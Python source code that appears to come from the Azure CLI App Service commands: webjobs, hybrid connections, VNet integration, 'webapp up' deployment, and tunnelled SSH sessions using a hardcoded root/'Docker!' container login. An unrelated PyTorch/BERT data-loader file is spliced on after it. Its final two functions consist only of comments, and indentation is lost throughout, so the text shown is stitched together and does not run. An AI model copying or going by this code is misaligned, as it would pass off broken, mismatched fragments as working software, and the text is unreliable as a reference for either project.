['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
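# Example (hypothetical account name, key redacted): the returned string has the shape
#   'DefaultEndpointsProtocol=https;EndpointSuffix=core.windows.net;AccountName=mystorage;AccountKey=<key>'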
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
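# Example: a region reported as 'West US 2' is normalized to {'name': 'westus2'}, since the names
# are lower-cased and spaces are removed.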
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
time.sleep(2)
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
        return logger.warning("Hybrid connections are not supported on Linux apps.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
        return logger.warning("Hybrid connections are not supported on Linux apps.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
                if z == AccessRights.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
                if z == AccessRights.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensure the key type input is valid
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
        return logger.warning("Hybrid connections are not supported on Linux apps.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnet_id = ''
for v in list_all_vnets:
if v.name == vnet:
vnet_id = v.id
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet_id.split('/')
vnet_resource_group = ''
i = 0
for z in vnet_id_strings:
if z.lower() == "resourcegroups":
vnet_resource_group = vnet_id_strings[i + 1]
i = i + 1
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
    # reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_create_new_app = does_app_already_exist(cmd, name)
os_name = detect_os_form_src(src_dir, html)
lang_details = get_lang_from_content(src_dir, html)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists
        # Get the ASP & RG info; if the ASP & RG parameters are provided we use those, else we need to find them
logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of "
"the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please "
"re-run command with the correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
            raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}. "
                           "Please check if you have configured defaults for plan name and re-run command."
                           .format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
            raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to "
                           "'{}'. "
                           "Please create a new app to continue this operation.".format(name, current_os,
                                                                                        src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("webapp %s doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
        logger.warning("Web app will be created with the below configuration, re-run command "
                       "without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan
    # settings were updated, we update those as well
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=location)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
    else:  # for an existing app we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify())
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
        raise CLIError("Only Linux App Service Plans are supported; found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
        while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
        while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
        raise CLIError('webapp ssh is only supported on Linux and macOS')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
warmup_dataloader.py
import sys
import os
import threading
import numpy as np
import torch
import json
import jieba
import string
import unicodedata
import multiprocessing as mp
#mp.set_start_method('spawn')
from pytorch_pretrained_bert.tokenization import BasicTokenizer, BertTokenizer
from pytorch_pretrained_bert.tokenization import _is_punctuation, _is_whitespace, _is_control
from pytorch_pretrained_bert.dataset_processor import PretrainingProcessor, MRQAExample
from multiprocessing import Process, Queue
from stopwordsiso import stopwords
def move_to_cuda(sample):
if len(sample) == 0:
return {}
def _move_to_cuda(maybe_tensor):
if torch.is_tensor(maybe_tensor):
return maybe_tensor.cuda()
elif isinstance(maybe_tensor, dict):
return {
key: _move_to_cuda(value)
for key, value in maybe_tensor.items()
}
elif isinstance(maybe_tensor, list):
return [_move_to_cuda(x) for x in maybe_tensor]
else:
return maybe_tensor
return _move_to_cuda(sample)
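# Example (hypothetical sample): move_to_cuda({'ids': torch.zeros(2), 'meta': ['a', 'b']}) returns the
# same structure with the 'ids' tensor moved to the GPU and the non-tensor 'meta' list left untouched.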
def tokenize(text):
tokens = []
for t in text:
tokens.append(t)
return tokens
def convert_tokens_to_ids(tokens, word2id):
token_ids = []
for idx, f in enumerate(tokens):
token_ids.append(word2id[f] if f in word2id else word2id['[UNK]'])
return token_ids
def multi_process_get_warmup_data_queue_cn(args, start, end, p_list):
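# Spawns args.enqueue_thread_num worker processes, each reading its own byte range of
# args.train_file, filtering warm-up (high question/context overlap) samples and pushing
# converted features onto its own Queue. Returns the list of queues; the started Process
# objects are appended to p_list so the caller can join or terminate them later.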
def warmup_sample_filter(examples, stopwords, jacc_thres,
do_lower_case, warmup_window_size, max_warmup_query_length,
max_comma_num):
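# Heuristic warm-up filter: keep an example only if the question is short enough, the
# paragraph tokenizes consistently with jieba, the window around the answer span does not
# contain too many enumeration commas, and the token overlap between question and context
# (see the jaccard computation below) reaches jacc_thres.
# Returns (is_warmup, context_tok_set).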
